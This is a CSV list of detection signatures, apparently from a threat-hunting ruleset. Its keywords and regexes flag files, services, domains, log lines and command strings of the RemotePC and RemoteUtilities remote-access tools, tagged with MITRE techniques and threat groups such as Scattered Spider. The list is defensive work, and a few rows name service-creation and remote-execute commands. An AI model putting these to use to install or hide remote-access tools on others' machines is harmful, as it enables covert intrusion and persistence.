"*RemotePC.exe *",".{0,1000}RemotePC\.exe\s.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*RemotePC.WebSockets.dll*",".{0,1000}RemotePC\.WebSockets\.dll.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*RemotePC\REMOTE~2.DLL*",".{0,1000}RemotePC\\REMOTE\~2\.DLL.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*RemotePCAttended.exe*",".{0,1000}RemotePCAttended\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*RemotePCAttendedService*",".{0,1000}RemotePCAttendedService.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*RemotePCBlackScreenApp.exe*",".{0,1000}RemotePCBlackScreenApp\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*RemotePCCopyPaste.txt*",".{0,1000}RemotePCCopyPaste\.txt.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*RemotePCDesktop.exe*",".{0,1000}RemotePCDesktop\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*RemotePCDesktop.exe*",".{0,1000}RemotePCDesktop\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*RemotePCDesktop.txt*",".{0,1000}RemotePCDesktop\.txt.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*RemotePCHDDesktop.txt*",".{0,1000}RemotePCHDDesktop\.txt.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*RemotePCHDService.txt*",".{0,1000}RemotePCHDService\.txt.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*remotepclauncher.exe *",".{0,1000}remotepclauncher\.exe\s.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*RemotePCModules.log*",".{0,1000}RemotePCModules\.log.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*RemotePCPerformanceWebLauncher.exe*",".{0,1000}RemotePCPerformanceWebLauncher\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*RemotePCPerformanceWebLauncher.log*",".{0,1000}RemotePCPerformanceWebLauncher\.log.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*RemotePCPrinter.exe.config*",".{0,1000}RemotePCPrinter\.exe\.config.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*RemotePCPrinting.exe*",".{0,1000}RemotePCPrinting\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*RemotePCPrintView.exe*",".{0,1000}RemotePCPrintView\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*RemotePCProxys.dat*",".{0,1000}RemotePCProxys\.dat.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*RemotePCService.exe*",".{0,1000}RemotePCService\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*RemotePCService.txt*",".{0,1000}RemotePCService\.txt.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*RemotePCService_2.txt*",".{0,1000}RemotePCService_2\.txt.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*RemotePCShortcut.exe*",".{0,1000}RemotePCShortcut\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*RemotePCSuite.Model.dll*",".{0,1000}RemotePCSuite\.Model\.dll.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*RemotePCSuite.Service.dll*",".{0,1000}RemotePCSuite\.Service\.dll.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*RemotePCSuite.Service.dll*",".{0,1000}RemotePCSuite\.Service\.dll.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*remotepcuiu.exe *",".{0,1000}remotepcuiu\.exe\s.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*RpcApp*TransferClient.exe*",".{0,1000}RpcApp.{0,1000}TransferClient\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*RpcApp*TransferServer.exe*",".{0,1000}RpcApp.{0,1000}TransferServer\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*RpcApp\Tools\TransferClient.exe*",".{0,1000}RpcApp\\Tools\\TransferClient\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*RPCAttendedInstaller.log*",".{0,1000}RPCAttendedInstaller\.log.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*rpcdownloader.exe *",".{0,1000}rpcdownloader\.exe\s.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*RPCDownloaderLogFile.txt*",".{0,1000}RPCDownloaderLogFile\.txt.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*RPCFireWallRule.exe*",".{0,1000}RPCFireWallRule\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*RPCFireWallRulelogfile.txt*",".{0,1000}RPCFireWallRulelogfile\.txt.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*RPCKeyMouseHandler.txt*",".{0,1000}RPCKeyMouseHandler\.txt.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*RPCPerformanceHealthCheck*",".{0,1000}RPCPerformanceHealthCheck.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*rpcperformanceservice.exe*",".{0,1000}rpcperformanceservice\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*RPCPerformanceService.exe*",".{0,1000}RPCPerformanceService\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*rpcperfviewer.exe *",".{0,1000}rpcperfviewer\.exe\s.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*RPCPerfViewer.log*",".{0,1000}RPCPerfViewer\.log.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*rpcprinterdownloader.exe*",".{0,1000}rpcprinterdownloader\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*RPCProxyLatency.exe *",".{0,1000}RPCProxyLatency\.exe\s.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*RPCsuiteLaunch.txt*",".{0,1000}RPCsuiteLaunch\.txt.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*rule name=""TransferServer""*",".{0,1000}rule\sname\=\""TransferServer\"".{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc  delete ""RPCService""*",".{0,1000}sc\s\sdelete\s\""RPCService\"".{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc  start ""RPCService""*",".{0,1000}sc\s\sstart\s\""RPCService\"".{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc  stop ""RPCService""*",".{0,1000}sc\s\sstop\s\""RPCService\"".{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc create RPCService start=auto*",".{0,1000}sc\screate\sRPCService\sstart\=auto.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc create RPCService*",".{0,1000}sc\screate\sRPCService.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete ""RPCService""*",".{0,1000}sc\sdelete\s\""RPCService\"".{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete ViewerService*",".{0,1000}sc\sdelete\sViewerService.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc start ViewerService*",".{0,1000}sc\sstart\sViewerService.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc stop ""RPCService""*",".{0,1000}sc\sstop\s\""RPCService\"".{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc stop ViewerService*",".{0,1000}sc\sstop\sViewerService.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*StartRPCPerformanceService*",".{0,1000}StartRPCPerformanceService.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*StartRPCPerformanceServiceOnStart*",".{0,1000}StartRPCPerformanceServiceOnStart.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*static.remotepc.com*",".{0,1000}static\.remotepc\.com.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*static.remotepc.com*",".{0,1000}static\.remotepc\.com.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","network","10","10","N/A","N/A","N/A","N/A"
"*Uninstall RemotePC.lnk*",".{0,1000}Uninstall\sRemotePC\.lnk.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*viewerhostkeypopup.exe *",".{0,1000}viewerhostkeypopup\.exe\s.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*web1.remotepc.com*",".{0,1000}web1\.remotepc\.com.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*web1.remotepc.com*",".{0,1000}web1\.remotepc\.com.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*www1.remotepc.com*",".{0,1000}www1\.remotepc\.com.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* Connection #*. Connection to ""*"" established. Mode: <Remote control>.*",".{0,1000}\sConnection\s\#.{0,1000}\.\sConnection\sto\s\"".{0,1000}\""\sestablished\.\sMode\:\s\<Remote\scontrol\>\..{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* Connection #*. Connection to ""*"". Security check - OK. Mode:  <Inventory manager>*",".{0,1000}\sConnection\s\#.{0,1000}\.\sConnection\sto\s\"".{0,1000}\""\.\sSecurity\scheck\s\-\sOK\.\sMode\:\s\s\<Inventory\smanager\>.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* Connection #*. Connection to ""*"". Security check - OK. Mode: <Command (command: *)>",".{0,1000}\sConnection\s\#.{0,1000}\.\sConnection\sto\s\"".{0,1000}\""\.\sSecurity\scheck\s\-\sOK\.\sMode\:\s\<Command\s\(command\:\s.{0,1000}\)\>","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* Connection #*. Direct connection to * (*:5650).*",".{0,1000}\sConnection\s\#.{0,1000}\.\sDirect\sconnection\sto\s.{0,1000}\s\(.{0,1000}\:5650\)\..{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* -name:* -password:* -remoteexecute -filename*",".{0,1000}\s\-name\:.{0,1000}\s\-password\:.{0,1000}\s\-remoteexecute\s\-filename.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*.remoteutilities.com*",".{0,1000}\.remoteutilities\.com.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/host-7.2.2.0.msi*",".{0,1000}\/host\-7\.2\.2\.0\.msi.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/rfusclient.exe*",".{0,1000}\/rfusclient\.exe.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/rutserv.exe*",".{0,1000}\/rutserv\.exe.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/rutview.exe*",".{0,1000}\/rutview\.exe.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/usr/bin/r-agent*",".{0,1000}\/usr\/bin\/r\-agent.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","linux","10","10","N/A","N/A","N/A","N/A"
"*/usr/bin/r-viewer*",".{0,1000}\/usr\/bin\/r\-viewer.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","linux","10","10","N/A","N/A","N/A","N/A"
"*/usr/share/applications/r-agent.desktop*",".{0,1000}\/usr\/share\/applications\/r\-agent\.desktop.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","linux","10","10","N/A","N/A","N/A","N/A"
"*/usr/share/applications/r-viewer.desktop*",".{0,1000}\/usr\/share\/applications\/r\-viewer\.desktop.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","linux","10","10","N/A","N/A","N/A","N/A"
"*/VPDAgent.exe*",".{0,1000}\/VPDAgent\.exe.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\*-*-*_rut-*.zip.3bf*","[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}_rut-[0-9]\.[0-9]\.[0-9]\.[0-9]\.zip\.3bf","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
